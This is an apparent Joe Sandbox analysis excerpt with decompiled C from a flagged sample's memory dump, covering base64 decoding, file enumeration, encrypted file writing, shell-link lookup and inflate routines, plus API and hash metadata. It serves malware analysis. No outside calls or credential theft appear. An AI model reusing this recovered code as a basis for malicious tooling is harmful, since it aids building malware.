                                        				if(CryptStringToBinaryA(__ebx, 0, 1, 0, __eax, 0, 0) == 0) {
                                        					L4:
                                        					return 0;
                                        				}
                                        				_t5 = LocalAlloc(0x40,  *_t12);
                                        				 *__edi = _t5;
                                        				if(_t5 == 0) {
                                        					goto L4;
                                        				}
                                        				_t6 = CryptStringToBinaryA(__ebx, 0, 1, _t5, _t12, 0, 0);
                                        				_t13 = _t6;
                                        				if(_t13 != 0) {
                                        					return _t6;
                                        				} else {
                                        					 *__edi = LocalFree( *__edi);
                                        					return _t13;
                                        				}
                                        			}








                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,-0000000F,00000000,00000000), ref: 29D991CB
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 29D991DA
                                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,-0000000F,00000000,00000000), ref: 29D991F1
                                        • LocalFree.KERNEL32 ref: 29D99200
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        • Opcode ID: 54c9b1a22fc7d1f94f6e82b27d4312ec63fac8f3c59d91d9e006046c7186ddec
                                        • Instruction ID: 2265a759cd92f2bd7cd02a365940045cf01343d206717094385558834542daf0
                                        • Opcode Fuzzy Hash: 54c9b1a22fc7d1f94f6e82b27d4312ec63fac8f3c59d91d9e006046c7186ddec
                                        • Instruction Fuzzy Hash: B5F03AB13903126BF7356F65AC4AF537BA9EF04BA0F200014FA44EB2C0E7B5D8409BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E29DA4C40(intOrPtr* __ecx, void* __eflags, char _a4, intOrPtr _a24) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v24;
                                        				intOrPtr _v32;
                                        				short _v36;
                                        				char _v52;
                                        				intOrPtr _v60;
                                        				short _v64;
                                        				short _v80;
                                        				struct _WIN32_FIND_DATAW _v672;
                                        				void* _v676;
                                        				char _v680;
                                        				intOrPtr* _v684;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t52;
                                        				signed int _t53;
                                        				WCHAR* _t57;
                                        				intOrPtr* _t60;
                                        				intOrPtr* _t71;
                                        				intOrPtr* _t84;
                                        				intOrPtr _t85;
                                        				intOrPtr _t89;
                                        				intOrPtr _t98;
                                        				void* _t103;
                                        				void* _t105;
                                        				intOrPtr _t109;
                                        				intOrPtr _t113;
                                        				signed int _t114;
                                        				void* _t115;
                                        				void* _t116;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC2A8A);
                                        				_push( *[fs:0x0]);
                                        				_t116 = _t115 - 0x2a0;
                                        				_t52 =  *0x29dd5664; // 0xd9555f04
                                        				_t53 = _t52 ^ _t114;
                                        				_v24 = _t53;
                                        				_push(_t53);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t84 = __ecx;
                                        				_v684 = __ecx;
                                        				_v680 = 0;
                                        				_v8 = 1;
                                        				_t57 = E29DA4990( &_a4, __ecx,  &_v80);
                                        				if(_t57[0xa] >= 8) {
                                        					_t57 =  *_t57;
                                        				}
                                        				_v676 = FindFirstFileW(_t57,  &_v672);
                                        				if(_v60 >= 8) {
                                        					_push(_v80);
                                        					E29DADF3B();
                                        					_t116 = _t116 + 4;
                                        				}
                                        				_v60 = 7;
                                        				_v64 = 0;
                                        				_v80 = 0;
                                        				 *_t84 = 0;
                                        				 *((intOrPtr*)(_t84 + 4)) = 0;
                                        				 *((intOrPtr*)(_t84 + 8)) = 0;
                                        				_v32 = 7;
                                        				_t60 =  &(_v672.cFileName);
                                        				_v52 = 0;
                                        				_v680 = 1;
                                        				_v36 = 0;
                                        				_t103 = _t60 + 2;
                                        				do {
                                        					_t89 =  *_t60;
                                        					_t60 = _t60 + 2;
                                        				} while (_t89 != 0);
                                        				E29DA41B0( &(_v672.cFileName),  &_v52, _t60 - _t103 >> 1);
                                        				_v8 = 2;
                                        				E29DA6120(_t84,  &_v52);
                                        				_v8 = 1;
                                        				if(_v32 >= 8) {
                                        					_push(_v52);
                                        					E29DADF3B();
                                        					_t116 = _t116 + 4;
                                        				}
                                        				_t104 = _v676;
                                        				while(FindNextFileW(_v676,  &_v672) != 0) {
                                        					_v52 = 0;
                                        					_t71 =  &(_v672.cFileName);
                                        					_v32 = 7;
                                        					_v36 = 0;
                                        					_t105 = _t71 + 2;
                                        					do {
                                        						_t98 =  *_t71;
                                        						_t71 = _t71 + 2;
                                        					} while (_t98 != 0);
                                        					E29DA41B0( &(_v672.cFileName),  &_v52, _t71 - _t105 >> 1);
                                        					_v8 = 3;
                                        					E29DA6120(_t84,  &_v52);
                                        					_v8 = 1;
                                        					if(_v32 >= 8) {
                                        						_push(_v52);
                                        						E29DADF3B();
                                        						_t116 = _t116 + 4;
                                        					}
                                        					_t104 =  &_v672;
                                        				}
                                        				if(_a24 >= 0x10) {
                                        					_push(_a4);
                                        					E29DADF3B();
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t109);
                                        				_pop(_t113);
                                        				_pop(_t85);
                                        				return E29DADF46(_t84, _t85, _v24 ^ _t114, _t104, _t109, _t113);
                                        			}




































                                        APIs
                                          • Part of subcall function 29DA4990: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,015A2EF8,00000000,00000000,?,?,29D9F7D1,?,?), ref: 29DA49B9
                                          • Part of subcall function 29DA4990: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 29DA49EF
                                        • FindFirstFileW.KERNEL32(00000000,?,?,D9555F04,?,00000000,00000000), ref: 29DA4CA2
                                        • FindNextFileW.KERNEL32(?,?,?), ref: 29DA4D46
                                        • FindNextFileW.KERNEL32(?,?,?), ref: 29DA4DBD
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$ByteCharMultiNextWide$First
                                        • String ID:
                                        • API String ID: 1501163664-0
                                        • Opcode ID: 7d04c1a30265ff7bc1bf9215cdcd15b87f69bc77bde7c6e9a8cde7f9ba0798a0
                                        • Instruction ID: 4fd3162a70d9f18cd12142da5a3952a831da75231a8e17976afd1ab095ab49e3
                                        • Opcode Fuzzy Hash: 7d04c1a30265ff7bc1bf9215cdcd15b87f69bc77bde7c6e9a8cde7f9ba0798a0
                                        • Instruction Fuzzy Hash: BC513B71D10259EBCF14CFA4D884ADEBBB8FF55300F4481AEE809A7240DB74A655DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 88%
                                        			E29DABF80(void* __ecx, signed int _a4, long _a8) {
                                        				signed char _v8;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* _t47;
                                        				intOrPtr _t54;
                                        				signed int _t56;
                                        				void* _t65;
                                        				void* _t74;
                                        				void* _t76;
                                        				signed char _t80;
                                        				signed char _t85;
                                        				unsigned int _t89;
                                        				void* _t94;
                                        				long _t102;
                                        				unsigned int _t107;
                                        				void* _t110;
                                        				void* _t115;
                                        
                                        				_push(__ecx);
                                        				_t68 = _a4;
                                        				_t110 = __ecx;
                                        				_t102 = _a8;
                                        				_t47 = _a4;
                                        				if( *((char*)(__ecx + 0x2d)) == 0) {
                                        					L10:
                                        					_t95 =  *((intOrPtr*)(_t110 + 0x20));
                                        					if( *((intOrPtr*)(_t110 + 0x20)) == 0) {
                                        						_t76 =  *(_t110 + 4);
                                        						__eflags = _t76;
                                        						if(_t76 == 0) {
                                        							 *((intOrPtr*)(_t110 + 0x14)) = 0x1000000;
                                        							__eflags = 0;
                                        							return 0;
                                        						} else {
                                        							WriteFile(_t76, _t47, _t102,  &_a8, 0);
                                        							return _a8;
                                        						}
                                        					} else {
                                        						_t77 =  *(_t110 + 0x24);
                                        						if( *(_t110 + 0x24) + _t102 <  *((intOrPtr*)(_t110 + 0x28))) {
                                        							E29DB0010(_t77 + _t95, _t47, _t102);
                                        							_t41 = _t110 + 0x24;
                                        							 *_t41 =  *(_t110 + 0x24) + _t102;
                                        							__eflags =  *_t41;
                                        							return _t102;
                                        						} else {
                                        							 *((intOrPtr*)(_t110 + 0x14)) = 0x30000;
                                        							return 0;
                                        						}
                                        					}
                                        				} else {
                                        					_t54 =  *((intOrPtr*)(__ecx + 0x3c));
                                        					if(_t54 != 0 &&  *((intOrPtr*)(__ecx + 0x40)) < _t102) {
                                        						_push(_t54);
                                        						E29DADF3B();
                                        						_t115 = _t115 + 4;
                                        						 *(_t110 + 0x3c) = 0;
                                        					}
                                        					_t120 =  *(_t110 + 0x3c);
                                        					if( *(_t110 + 0x3c) == 0) {
                                        						_t65 = E29DAE70E(_t68, _t94, _t102, _t110, _t120, _t102 + _t102);
                                        						_t115 = _t115 + 4;
                                        						 *(_t110 + 0x3c) = _t65;
                                        						 *(_t110 + 0x40) = _t102;
                                        					}
                                        					E29DB0010( *(_t110 + 0x3c), _t68, _t102);
                                        					_t115 = _t115 + 0xc;
                                        					_t74 = 0;
                                        					if(_t102 == 0) {
                                        						L9:
                                        						_t47 =  *(_t110 + 0x3c);
                                        						goto L10;
                                        					} else {
                                        						do {
                                        							_t80 =  *((intOrPtr*)(_t74 +  *(_t110 + 0x3c)));
                                        							_t107 =  *(_t110 + 0x30);
                                        							_a4 = _t80;
                                        							_v8 =  *(0x29dcd9b0 + ((_t80 ^ _t107) & 0x000000ff) * 4);
                                        							_t56 =  *(_t110 + 0x38);
                                        							_v8 = _v8 ^ _t107 >> 0x00000008;
                                        							_t85 = _v8;
                                        							 *(_t110 + 0x30) = _t85;
                                        							_t89 = 1 + ((_t85 & 0x000000ff) +  *(_t110 + 0x34)) * 0x8088405;
                                        							 *(_t110 + 0x34) = _t89;
                                        							 *(_t110 + 0x38) = _t56 >> 0x00000008 ^  *(0x29dcd9b0 + ((_t89 >> 0x00000018 ^ _t56) & 0x000000ff) * 4);
                                        							_t74 = _t74 + 1;
                                        							 *(_t74 +  *(_t110 + 0x3c) - 1) = ((_t56 & 0x0000fffd | 0x00000002) ^ 0x00000001) * (_t56 & 0x0000fffd | 0x00000002) >> 0x00000008 ^ _a4;
                                        						} while (_t74 < _a8);
                                        						_t102 = _a8;
                                        						goto L9;
                                        					}
                                        				}
                                        			}






















                                        APIs
                                        • _memmove.LIBCMT ref: 29DABFD5
                                        • _memmove.LIBCMT ref: 29DAC094
                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,00140B17,?,?,?,?,29DAB085,?,00000001,?,?,29DACBC1), ref: 29DAC0BA
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memmove$FileWrite
                                        • String ID:
                                        • API String ID: 726942401-0
                                        • Opcode ID: de39b1eeb925ff8b991cfd4d5d588eea5ce4fb878d20f0c91079387b15d763ff
                                        • Instruction ID: 1e86329156ed4265d81e5ca5cc8cacdab4f1f65e4a143206df25dcf8c53b0577
                                        • Opcode Fuzzy Hash: de39b1eeb925ff8b991cfd4d5d588eea5ce4fb878d20f0c91079387b15d763ff
                                        • Instruction Fuzzy Hash: 334100726007049FC768DF29D980A67F7E8FF94320F50892EE98687E00D235F515CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 33%
                                        			E29D8FA90(intOrPtr __ebx, char* __edi) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				short _v1060;
                                        				char _v1380;
                                        				int _v1384;
                                        				int _v1388;
                                        				void* __esi;
                                        				signed int _t22;
                                        				intOrPtr* _t28;
                                        				int _t32;
                                        				intOrPtr* _t34;
                                        				intOrPtr* _t36;
                                        				int _t38;
                                        				intOrPtr _t47;
                                        				void* _t53;
                                        				intOrPtr _t56;
                                        				signed int _t57;
                                        
                                        				_t55 = __edi;
                                        				_t41 = __ebx;
                                        				_t22 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t22 ^ _t57;
                                        				_v1384 = 0;
                                        				 *((char*)(__ebx)) = 0;
                                        				_t56 =  *0x29dd83d8(0x29dc5218, 0, 1, 0x29dc5208,  &_v1384);
                                        				if(_t56 < 0) {
                                        					L6:
                                        					_t26 = _t56;
                                        				} else {
                                        					_t28 = _v1384;
                                        					_v1388 = 0;
                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t28))))(_t28, 0x29dc5228,  &_v1388);
                                        					MultiByteToWideChar(0, 0, __edi, 0xffffffff,  &_v1060, 0x104);
                                        					_t32 = _v1388;
                                        					_t53 =  *_t32;
                                        					_t51 =  *((intOrPtr*)(_t53 + 0x14));
                                        					_t56 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x14))))(_t32,  &_v1060, 0);
                                        					if(_t56 < 0) {
                                        						goto L6;
                                        					} else {
                                        						_t34 = _v1384;
                                        						_t47 =  *_t34;
                                        						_t51 =  *((intOrPtr*)(_t47 + 0x4c));
                                        						_t56 =  *((intOrPtr*)( *((intOrPtr*)(_t47 + 0x4c))))(_t34, 0, 1);
                                        						if(_t56 < 0) {
                                        							goto L6;
                                        						} else {
                                        							_t36 = _v1384;
                                        							_push(4);
                                        							_push( &_v1380);
                                        							_push(0x104);
                                        							_t51 =  &_v276;
                                        							_push( &_v276);
                                        							_push(_t36);
                                        							if( *((intOrPtr*)( *((intOrPtr*)( *_t36 + 0xc))))() >= 0) {
                                        								_t38 = _v1384;
                                        								_t51 =  &_v540;
                                        								_t56 =  *((intOrPtr*)( *((intOrPtr*)( *_t38 + 0x18))))(_t38,  &_v540, 0x104);
                                        								if(_t56 >= 0) {
                                        									 *0x29dd8498(__ebx,  &_v276, 0x104);
                                        									goto L6;
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				return E29DADF46(_t26, _t41, _v8 ^ _t57, _t51, _t55, _t56);
                                        			}






















                                        APIs
                                        • CoCreateInstance.OLE32(29DC5218,00000000,00000001,29DC5208,?), ref: 29D8FAC6
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 29D8FB0C
                                        • lstrcpyn.KERNEL32(?,?,00000104,?,000000FF,?,00000104), ref: 29D8FB9B
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                        • String ID:
                                        • API String ID: 1940255200-0
                                        • Opcode ID: 2e3aae5e77dcb606c1c8b93e9a36a1729f5f076bf7778e398bcf6a7b9057d57f
                                        • Instruction ID: 6d5e14300d9b2d0995ba1f699724cdb02ad4515a39a7e52db67f660ef5d501fa
                                        • Opcode Fuzzy Hash: 2e3aae5e77dcb606c1c8b93e9a36a1729f5f076bf7778e398bcf6a7b9057d57f
                                        • Instruction Fuzzy Hash: 7A315471A41714AFD710DB58CC91FAA77B8EF88711F4042D8F618EB290DAB1AD46CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DB77BA() {
                                        
                                        				SetUnhandledExceptionFilter(E29DB7778);
                                        				return 0;
                                        			}



                                        0x29db77bf
                                        0x29db77c7

                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00037778), ref: 29DB77BF
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 1d1a13af8d155388c8fd7bf4f66555938eec3003646aefc9f62cd91372e47641
                                        • Instruction ID: 330f2c88648578a1bba42e65ba60f59cbf3aadab52c9841cffe8e8b1e7afeb80
                                        • Opcode Fuzzy Hash: 1d1a13af8d155388c8fd7bf4f66555938eec3003646aefc9f62cd91372e47641
                                        • Instruction Fuzzy Hash: 639002A51550414746016774996C50525D06A891867D18494E083D8808DA9440157591
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E29D8B1E0(signed int* __ecx, signed int* __edx, signed int _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, signed int* _a24, intOrPtr _a28, signed int* _a32) {
                                        				signed int _v8;
                                        				unsigned int _v16;
                                        				unsigned int _v20;
                                        				unsigned int _v24;
                                        				unsigned int _v28;
                                        				unsigned int _v32;
                                        				unsigned int _v36;
                                        				unsigned int _v40;
                                        				unsigned int _v44;
                                        				unsigned int _v48;
                                        				unsigned int _v52;
                                        				unsigned int _v56;
                                        				unsigned int _v60;
                                        				unsigned int _v64;
                                        				unsigned int _v68;
                                        				unsigned int _v72;
                                        				unsigned int _v76;
                                        				signed int _v136;
                                        				signed int _v140;
                                        				signed int _v144;
                                        				signed int _v148;
                                        				signed int* _v152;
                                        				signed int _v156;
                                        				signed int* _v160;
                                        				intOrPtr _v164;
                                        				signed int _v168;
                                        				signed int _v172;
                                        				signed int _v176;
                                        				unsigned int _v180;
                                        				signed int _v184;
                                        				signed int _v188;
                                        				char _v191;
                                        				signed char _v192;
                                        				signed int _v196;
                                        				signed int* _v200;
                                        				signed int* _v204;
                                        				intOrPtr _v208;
                                        				intOrPtr _v212;
                                        				signed int _v216;
                                        				signed int* _v220;
                                        				signed int* _v224;
                                        				signed int _v284;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t205;
                                        				signed int _t209;
                                        				signed int _t214;
                                        				intOrPtr* _t215;
                                        				signed int** _t217;
                                        				signed int* _t218;
                                        				void* _t221;
                                        				signed int _t223;
                                        				signed int _t225;
                                        				signed int _t226;
                                        				signed int _t227;
                                        				signed int _t229;
                                        				signed int _t231;
                                        				signed int* _t233;
                                        				signed int _t235;
                                        				signed int _t238;
                                        				void* _t239;
                                        				void* _t240;
                                        				intOrPtr* _t243;
                                        				signed int _t246;
                                        				signed int* _t248;
                                        				signed int _t250;
                                        				signed int _t251;
                                        				intOrPtr _t252;
                                        				intOrPtr _t256;
                                        				signed int _t257;
                                        				signed int _t261;
                                        				intOrPtr _t266;
                                        				signed char _t276;
                                        				intOrPtr _t280;
                                        				signed char* _t283;
                                        				signed int _t288;
                                        				intOrPtr _t289;
                                        				signed int _t290;
                                        				signed char _t295;
                                        				signed int _t313;
                                        				signed int* _t318;
                                        				signed int _t320;
                                        				signed int _t321;
                                        				intOrPtr _t322;
                                        				signed int* _t326;
                                        				void* _t329;
                                        				signed int _t330;
                                        				void* _t332;
                                        				signed int* _t333;
                                        				unsigned int _t334;
                                        				signed int _t338;
                                        				signed int _t340;
                                        
                                        				_t248 = __ecx;
                                        				_t205 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t205 ^ _t340;
                                        				_t243 = _a20;
                                        				_v208 = _a28;
                                        				_t330 = _a4;
                                        				_v200 = _a32;
                                        				_t209 = 0;
                                        				_t318 = _a24;
                                        				_v160 = __ecx;
                                        				_v184 = _t330;
                                        				_v220 = _t243;
                                        				_v204 = __edx;
                                        				_v76 = 0;
                                        				_v72 = 0;
                                        				_v68 = 0;
                                        				_v64 = 0;
                                        				_v60 = 0;
                                        				_v56 = 0;
                                        				_v52 = 0;
                                        				_v48 = 0;
                                        				_v44 = 0;
                                        				_v40 = 0;
                                        				_v36 = 0;
                                        				_v32 = 0;
                                        				_v28 = 0;
                                        				_v24 = 0;
                                        				_v20 = 0;
                                        				_v16 = 0;
                                        				do {
                                        					_t288 =  *_t248;
                                        					 *((intOrPtr*)(_t340 + _t288 * 4 - 0x48)) =  *((intOrPtr*)(_t340 + _t288 * 4 - 0x48)) + 1;
                                        					_t289 = _t340 + _t288 * 4 - 0x48;
                                        					_t248 =  &(_t248[1]);
                                        					_t330 = _t330 - 1;
                                        				} while (_t330 != 0);
                                        				if(_v76 != _v184) {
                                        					_t290 =  *_t318;
                                        					_v144 = _t290;
                                        					_t250 = 1;
                                        					while( *((intOrPtr*)(_t340 + _t250 * 4 - 0x48)) == _t209) {
                                        						_t250 = _t250 + 1;
                                        						if(_t250 <= 0xf) {
                                        							continue;
                                        						}
                                        						break;
                                        					}
                                        					_v148 = _t250;
                                        					if(_t290 < _t250) {
                                        						_v144 = _t250;
                                        						_t290 = _t250;
                                        					}
                                        					_t331 = 0xf;
                                        					while( *((intOrPtr*)(_t340 + _t331 * 4 - 0x48)) == _t209) {
                                        						_t331 = _t331 - 1;
                                        						if(_t331 != 0) {
                                        							continue;
                                        						}
                                        						break;
                                        					}
                                        					_v172 = _t331;
                                        					if(_t290 > _t331) {
                                        						_v144 = _t331;
                                        						_t290 = _t331;
                                        					}
                                        					 *_t318 = _t290;
                                        					_t320 = 1 << _t250;
                                        					if(_t250 >= _t331) {
                                        						L18:
                                        						_t251 = _t331 * 4;
                                        						_t243 = _t340 + _t251 - 0x48;
                                        						_v168 = _t251;
                                        						_t252 =  *_t243;
                                        						_t321 = _t320 - _t252;
                                        						_v216 = _t321;
                                        						if(_t321 < 0) {
                                        							goto L28;
                                        						} else {
                                        							 *_t243 = _t252 + _t321;
                                        							_t256 = 0;
                                        							_t332 = _t331 - 1;
                                        							_v136 = _t209;
                                        							if(_t332 != 0) {
                                        								_t329 = 0;
                                        								do {
                                        									_t256 = _t256 +  *((intOrPtr*)(_t340 + _t329 - 0x44));
                                        									_t329 = _t329 + 4;
                                        									_t332 = _t332 - 1;
                                        									 *((intOrPtr*)(_t340 + _t329 - 0x84)) = _t256;
                                        								} while (_t332 != 0);
                                        							}
                                        							_t333 = _v160;
                                        							_t322 = 0;
                                        							do {
                                        								_t257 =  *_t333;
                                        								_t333 =  &(_t333[1]);
                                        								_v152 = _t333;
                                        								if(_t257 != _t209) {
                                        									_t338 =  *(_t340 + _t257 * 4 - 0x88);
                                        									 *((intOrPtr*)(_v200 + _t338 * 4)) = _t322;
                                        									 *(_t340 + _t257 * 4 - 0x88) = _t338 + 1;
                                        									_t333 = _v152;
                                        								}
                                        								_t322 = _t322 + 1;
                                        							} while (_t322 < _v184);
                                        							_v184 =  *((intOrPtr*)(_t340 + _v168 - 0x88));
                                        							_v152 = _v200;
                                        							_t261 = _v148;
                                        							_t321 = 0;
                                        							_t246 =  ~_t290;
                                        							_v180 = 0;
                                        							_v140 = _t209;
                                        							_v156 = 0xffffffff;
                                        							_v284 = _t209;
                                        							_v160 = _t209;
                                        							_v168 = _t209;
                                        							if(_t261 > _v172) {
                                        								L70:
                                        								if(_v216 != _t209 && _v172 != 1) {
                                        									_t209 = 0xfffffffb;
                                        								}
                                        								return E29DADF46(_t209, _t246, _v8 ^ _t340, _t290, _t321, _t333);
                                        							} else {
                                        								_t331 = _v188;
                                        								_v176 = _t340 + _t261 * 4 - 0x48;
                                        								while(1) {
                                        									_t266 =  *_v176;
                                        									_v164 = _t266;
                                        									if(_t266 == _t209) {
                                        										goto L68;
                                        									}
                                        									do {
                                        										_v164 = _v164 - 1;
                                        										_t215 = _t246 + _t290;
                                        										if(_v148 <= _t215) {
                                        											L50:
                                        											_v191 = _v148 - _t246;
                                        											_t217 = _v152;
                                        											if(_t217 < _v200 + _v184 * 4) {
                                        												_t218 =  *_t217;
                                        												_t295 = _a8;
                                        												if(_t218 >= _t295) {
                                        													_t221 = _t218 - _t295 + _t218 - _t295 + _t218 - _t295 + _t218 - _t295;
                                        													_v192 =  *((intOrPtr*)(_t221 + _a16)) + 0x50;
                                        													_t331 =  *(_t221 + _a12);
                                        												} else {
                                        													asm("sbb dl, dl");
                                        													_v192 = (_t295 & 0x000000a0) + 0x60;
                                        													_t333 = _t218;
                                        												}
                                        												_v152 =  &(_v152[1]);
                                        											} else {
                                        												_v192 = 0xc0;
                                        											}
                                        											_t223 = _t321 >> _t246;
                                        											if(_t223 < _v168) {
                                        												_t283 = _v160 + _t223 * 8;
                                        												do {
                                        													 *_t283 = _v192;
                                        													_t283[4] = _t333;
                                        													_t223 = _t223 + 1;
                                        													_t283 =  &(_t283[8]);
                                        												} while (_t223 < _v168);
                                        												_t321 = _v180;
                                        											}
                                        											_t225 = 1 << _v148 - 1;
                                        											if((_t321 & 0x00000001) != 0) {
                                        												do {
                                        													_t321 = _t321 ^ _t225;
                                        													_t225 = _t225 >> 1;
                                        												} while ((_t321 & _t225) != 0);
                                        											}
                                        											_t321 = _t321 ^ _t225;
                                        											_t226 = _v156;
                                        											_v180 = _t321;
                                        											if(((0x00000001 << _t246) - 0x00000001 & _t321) !=  *((intOrPtr*)(_t340 + _t226 * 4 - 0x88))) {
                                        												do {
                                        													_t246 = _t246 - _v144;
                                        													_t226 = _t226 - 1;
                                        												} while (((0x00000001 << _t246) - 0x00000001 & _t321) !=  *((intOrPtr*)(_t340 + _t226 * 4 - 0x88)));
                                        												_v156 = _t226;
                                        											}
                                        											goto L67;
                                        										} else {
                                        											_v212 = _v164 + 1;
                                        											_v196 = _t246 - _t290;
                                        											while(1) {
                                        												_v196 = _v196 + _t290;
                                        												_v156 = _v156 + 1;
                                        												_t243 = _t215;
                                        												_t227 = _v144;
                                        												_t313 = _v172 - _t243;
                                        												if(_t313 > _t227) {
                                        													_t313 = _t227;
                                        												}
                                        												_t276 = _v148 - _t243;
                                        												_t229 = 1 << _t276;
                                        												if(1 > _v212) {
                                        												}
                                        												L38:
                                        												_t239 = _t229 + (_t321 | 0xffffffff) - _v164;
                                        												_t321 = _v176;
                                        												if(_t276 < _t313) {
                                        													_t276 = _t276 + 1;
                                        													if(_t276 < _t313) {
                                        														while(1) {
                                        															_t326 = _t321 + 4;
                                        															_v160 = _t326;
                                        															_t321 =  *_t326;
                                        															_t240 = _t239 + _t239;
                                        															if(_t240 <= _t321) {
                                        																goto L44;
                                        															}
                                        															_t276 = _t276 + 1;
                                        															_t239 = _t240 - _t321;
                                        															if(_t276 < _t313) {
                                        																_t321 = _v160;
                                        																continue;
                                        															}
                                        															goto L44;
                                        														}
                                        													}
                                        												}
                                        												L44:
                                        												_t231 =  *_v204;
                                        												_v168 = 1;
                                        												_t290 = (1 << _t276) + _t231;
                                        												if(1 > 0x5a0) {
                                        													goto L28;
                                        												} else {
                                        													_t321 = _v208 + _t231 * 8;
                                        													_t233 = _t340 + _v156 * 4 - 0x118;
                                        													_v224 = _t233;
                                        													 *_t233 = _t321;
                                        													 *_v204 = _t290;
                                        													_t235 = _v156;
                                        													_v160 = _t321;
                                        													if(_t235 == 0) {
                                        														 *_v220 = _t321;
                                        													} else {
                                        														_t334 = _v180;
                                        														 *(_t340 + _t235 * 4 - 0x88) = _t334;
                                        														_v192 = _t276;
                                        														_t238 = _t334 >> _v196;
                                        														_t280 =  *((intOrPtr*)(_v224 - 4));
                                        														_v191 = _v144;
                                        														_t331 = (_t321 - _t280 >> 3) - _t238;
                                        														 *(_t280 + _t238 * 8) = _v192;
                                        														 *(_t280 + 4 + _t238 * 8) = (_t321 - _t280 >> 3) - _t238;
                                        													}
                                        													_t215 = _t243 + _v144;
                                        													if(_v148 > _t215) {
                                        														_t290 = _v144;
                                        														_v196 = _v196 + _t290;
                                        														_v156 = _v156 + 1;
                                        														_t243 = _t215;
                                        														_t227 = _v144;
                                        														_t313 = _v172 - _t243;
                                        														if(_t313 > _t227) {
                                        															_t313 = _t227;
                                        														}
                                        														_t276 = _v148 - _t243;
                                        														_t229 = 1 << _t276;
                                        														if(1 > _v212) {
                                        														}
                                        														goto L44;
                                        													} else {
                                        														_t321 = _v180;
                                        														goto L50;
                                        													}
                                        												}
                                        												goto L74;
                                        											}
                                        										}
                                        										goto L74;
                                        										L67:
                                        										_t290 = _v144;
                                        									} while (_v164 != 0);
                                        									L68:
                                        									_v176 = _v176 + 4;
                                        									_t214 = _v148 + 1;
                                        									_v148 = _t214;
                                        									if(_t214 <= _v172) {
                                        										_t209 = 0;
                                        										continue;
                                        									} else {
                                        										_t209 = 0;
                                        										goto L70;
                                        									}
                                        									goto L74;
                                        								}
                                        							}
                                        						}
                                        					} else {
                                        						while(1) {
                                        							_t321 = _t320 -  *((intOrPtr*)(_t340 + _t250 * 4 - 0x48));
                                        							if(_t321 < 0) {
                                        								break;
                                        							}
                                        							_t250 = _t250 + 1;
                                        							_t320 = _t321 + _t321;
                                        							if(_t250 < _t331) {
                                        								continue;
                                        							} else {
                                        								goto L18;
                                        							}
                                        							goto L74;
                                        						}
                                        						L28:
                                        						return E29DADF46(0xfffffffd, _t243, _v8 ^ _t340, _t290, _t321, _t331);
                                        					}
                                        				} else {
                                        					 *_t243 = 0;
                                        					 *_t318 = 0;
                                        					return E29DADF46(0, _t243, _v8 ^ _t340, _t289, _t318, _t330);
                                        				}
                                        				L74:
                                        			}

                                        Memory Dump Source
